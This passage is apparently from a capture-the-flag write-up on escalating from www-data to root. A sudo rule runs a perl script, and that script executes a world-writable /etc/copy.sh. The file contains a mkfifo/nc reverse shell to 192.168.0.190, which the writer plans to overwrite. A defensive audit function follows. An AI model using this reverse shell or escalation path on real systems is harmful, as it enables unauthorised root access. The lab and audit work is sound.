www-data


Checking for sudo privileges of the www-data account after gaining the initial foothold

www-data@THM-Chal:/var/www$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

The www-data account can run /usr/bin/perl /home/itguy/backup.pl as any user, including root, without a password

www-data@THM-Chal:/var/www$ ls -lasht /home/itguy/backup.pl
4.0K -rw-r--r-x 1 root root 47 Nov 29  2019 /home/itguy/backup.pl

I can only read and execute the script

www-data@THM-Chal:/var/www$ cat /home/itguy/backup.pl
#!/usr/bin/perl
 
system("sh", "/etc/copy.sh");

The backup.pl script runs another shell script, /etc/copy.sh, through sh

www-data@THM-Chal:/var/www$ ls -lasht /etc/copy.sh
4.0K -rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh

Interestingly, I can write to the /etc/copy.sh script

www-data@THM-Chal:/var/www$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

The content of the /etc/copy.sh script is a reverse shell, which I can overwrite to gain privilege escalation
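
The weakness found above is a root-owned, sudo-permitted script that runs a file other users can modify. As an added example (not part of the original write-up), this shell function lists every file in such a script's call chain that is group- or world-writable; the function names are hypothetical, and only file modes are checked, not ownership or parent directories.

```shell
#!/bin/sh
# Added example: audit the files a sudo-permitted script depends on.
# loose_perms and audit_sudo_target are hypothetical helper names.
# Usage: audit_sudo_target /home/itguy/backup.pl

# Print the path if the file (symlinks followed) is group- or world-writable.
loose_perms() {
    find -L "$1" -prune \( -perm -002 -o -perm -020 \) -print 2>/dev/null
}

audit_sudo_target() {
    script=$1
    [ -r "$script" ] || { echo "cannot read $script" >&2; return 2; }
    {
        # The sudo-permitted script itself ...
        printf '%s\n' "$script"
        # ... plus every absolute path it mentions (interpreter, helper scripts).
        grep -oE '/[A-Za-z0-9_./-]+' "$script"
    } | sort -u | while IFS= read -r f; do
        [ -f "$f" ] || continue        # existing regular files only
        hit=$(loose_perms "$f")
        if [ -n "$hit" ]; then
            printf 'WRITABLE-BY-NON-OWNER %s\n' "$f"
        fi
    done
    return 0
}
```

Any path it reports should be owned by root and set to a mode such as 644 or 755 before the sudoers rule is trusted.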